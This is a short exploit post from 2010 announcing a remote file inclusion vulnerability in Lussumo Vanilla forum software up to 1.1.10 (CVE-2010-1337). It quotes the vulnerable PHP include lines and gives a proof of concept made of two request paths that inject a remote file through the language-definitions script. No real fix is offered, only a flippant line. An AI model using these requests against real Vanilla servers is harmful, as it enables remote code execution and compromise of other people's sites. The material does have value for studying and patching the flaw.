Home / os / win7

Vanilla-1.1.10 <= Remote File Inclusion Vulnerability

Posted on 13 April 2010

=====================================================
Vanilla-1.1.10 <= Remote File Inclusion Vulnerability
=====================================================

########################################################
    Vanilla-1.1.10 <= Remote File Inclusion Vulnerability
########################################################
 
Title:      Vanilla-1.1.10 <= Remote File Inclusion Vulnerability
Version:    1.1.10
link:       http://php.opensourcecms.com/scripts/redirect/website.php?id=128
License:    -
CVE-ID:     CVE-2010-1337
OSVDB-ID:   63654
Vulnerable: Lussumo Vanilla 1.1.10
        Lussumo Vanilla 1.1.9
        Lussumo Vanilla 1.1.8
        Lussumo Vanilla 1.1.7
        Lussumo Vanilla 1.1.5
        Lussumo Vanilla 1.1.4
        Lussumo Vanilla 1.1.3
        Lussumo Vanilla 1.0.1
        Lussumo Vanilla 1.1.5 RC1
        Lussumo Vanilla 1.0
References: http://www.packetstormsecurity.com/1003-exploits/vanilla-rfi.txt
        http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1337
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-1337
        http://osvdb.org/show/osvdb/63654
        http://www.securityfocus.com/bid/38889
        http://xforce.iss.net/xforce/xfdb/57147
########################################################
 
Author:     eidelweiss
Contact:    eidelweiss[at]cyberservices.com
Thanks: JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) - LeQhi - aRiee - idiot_inside - kuris
    Old friend in MEDANHACKER (c02,blackbandit,t0rnado,LordIRC,doegoel,qwert)
    AL-MARHUM - [D]eal [C]yber - syabilla_putri (miss u)
 
########################################################
 
    -=[ VULN ]=-
 
[-] include($Configuration['LANGUAGES_PATH'].$Configuration['LANGUAGE'].'/definitions.php');
 
[-] include($Configuration['APPLICATION_PATH'].'conf/language.php');
 
    -=[ P0C ]=-
 
[+] PATH/languages/yourlanguage/definitions.php?include= [inj3ct0r]
[+] PATH/languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= [inj3ct0r]
 
################################################################
[ FIX ] Use Your Skill and Play Your Imagination
################################################################


# Inj3ct0r.com [2010-04-13]

 

TOP

Malware :

Exploits :